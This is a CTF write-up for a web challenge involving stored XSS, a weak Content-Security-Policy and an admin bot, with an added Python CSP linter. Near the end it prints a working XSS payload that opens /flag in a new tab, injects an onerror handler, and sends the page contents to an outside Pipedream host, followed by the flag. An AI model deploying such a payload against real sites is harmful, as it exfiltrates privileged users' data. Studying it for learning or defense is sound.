web/California-state-police

We got an admin bot, and its cookies are set to HttpOnly and SameSite=Lax, so we can't get the cookie with just document.cookie; you will get an empty string. Read more about this here!

Website Overview

We have a home page with a form that is vulnerable to stored XSS.

Source code review

We can see that a CSP policy is set.

We can run it through csp-evaluator to check which parts of the policy are weak.
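The same kind of check can be done offline. The script below is an added example (not part of the write-up and not the challenge's code): it parses a Content-Security-Policy header and flags the three properties this class of challenge depends on, namely inline script execution, an unrestricted connect-src that lets fetch() send data to any host, and missing base-uri / object-src. The two sample headers are constructed for illustration; the challenge's real CSP header is not reproduced here.

```python
# Added example, not from the write-up: a small offline CSP linter.
# The sample headers at the bottom are constructed, not the challenge's real policy.
import re

NONCE_OR_HASH = re.compile(r"^'(nonce-|sha(256|384|512)-)")
# Fetch directives that inherit from default-src when they are absent.
FALLBACK_TO_DEFAULT = {"script-src", "connect-src", "img-src", "object-src", "style-src"}


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source, ...]}.
    Per the spec, only the first occurrence of a duplicated directive counts."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        policy.setdefault(name, tokens[1:])
    return policy


def effective_sources(policy: dict, directive: str):
    """Resolve a fetch directive, falling back to default-src.
    Returns None when neither is set, i.e. the directive is unrestricted."""
    if directive in policy:
        return policy[directive]
    if directive in FALLBACK_TO_DEFAULT:
        return policy.get("default-src")
    return None


def lint_csp(header: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    policy = parse_csp(header)
    findings = []

    script = effective_sources(policy, "script-src")
    if script is None:
        findings.append("script-src: unrestricted (no script-src or default-src), injected scripts run")
    else:
        has_nonce_or_hash = any(NONCE_OR_HASH.match(s) for s in script)
        # Browsers ignore 'unsafe-inline' once a nonce or hash source is present.
        if "'unsafe-inline'" in script and not has_nonce_or_hash:
            findings.append("script-src: 'unsafe-inline' without nonce/hash, "
                            "inline <script> and onerror= handlers execute")
        if "*" in script or "https:" in script:
            findings.append("script-src: wildcard host source, scripts can be loaded from any origin")

    connect = effective_sources(policy, "connect-src")
    if connect is None or "*" in connect or "https:" in connect:
        findings.append("connect-src: unrestricted, fetch()/XHR can send page data to arbitrary hosts")

    if "base-uri" not in policy:
        findings.append("base-uri: missing, <base> injection can redirect relative script URLs")
    if effective_sources(policy, "object-src") is None:
        findings.append("object-src: unrestricted, plugin content can be embedded")
    return findings


# Constructed sample: a permissive policy of the kind a stored XSS can abuse.
WEAK_CSP = "script-src 'self' 'unsafe-inline'; img-src *"
# Constructed sample: nonce-based policy with network access pinned to 'self'.
STRICT_CSP = ("default-src 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic'; "
              "connect-src 'self'; img-src 'self'; base-uri 'none'; object-src 'none'")

if __name__ == "__main__":
    for label, csp in (("weak", WEAK_CSP), ("strict", STRICT_CSP)):
        print(f"[{label}] {csp}")
        for finding in lint_csp(csp) or ["no findings"]:
            print("  -", finding)
```

Run it directly to compare the two constructed policies. For the write-up's scenario the connect-src finding is the one that matters for the exfiltration step: a connect-src of 'self' would have stopped the fetch() to the external collector host, though the injected script itself would still run as long as 'unsafe-inline' is present.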

How to Get Flag ?

We have a /flag route which only the admin can access.

So these were my leads during the CTF. I couldn't solve it, so after the CTF I checked a payload's first line, saw window.open, and with that clue in mind I started this challenge again.

These are the things we can do under that CSP:

  • We can inject a script into that page.

  • We can't access or fetch the /flag route; we can only execute JS in the present page.

  • We can control the whole browser through the window object.

With these in mind, let's plan a payload:

  • We can open another tab on /flag with window.open().

  • We can execute code in that tab through the variable it is assigned to.

  • So, when /flag has loaded, we have to inject something there that makes a POST request to /flag and sends that data to our server.

<script>
// open /flag in a new same-origin tab; the browser attaches the admin's session cookie itself
tab=window.open("/flag");
// once that tab has loaded, write an <img> whose onerror handler POSTs /flag and relays the response body
tab.window.onload=()=>tab.window.document.write(`<img src=x onerror="fetch('/flag',{method:'POST'}).then(response=>response.text()).then(response => fetch('https://eoeq1wfgfu9ld15.m.pipedream.net/?flag='+btoa(response)))"></img>`)
</script>

After submitting the crime to the admin bot, we will get the flag.

lactf{m4yb3_g1v1ng_fr33_xss_1s_jus7_4_b4d_1d3a}

Homework (well, not exactly homework).

I want the web team members to come up with another way to do this without using fetch.
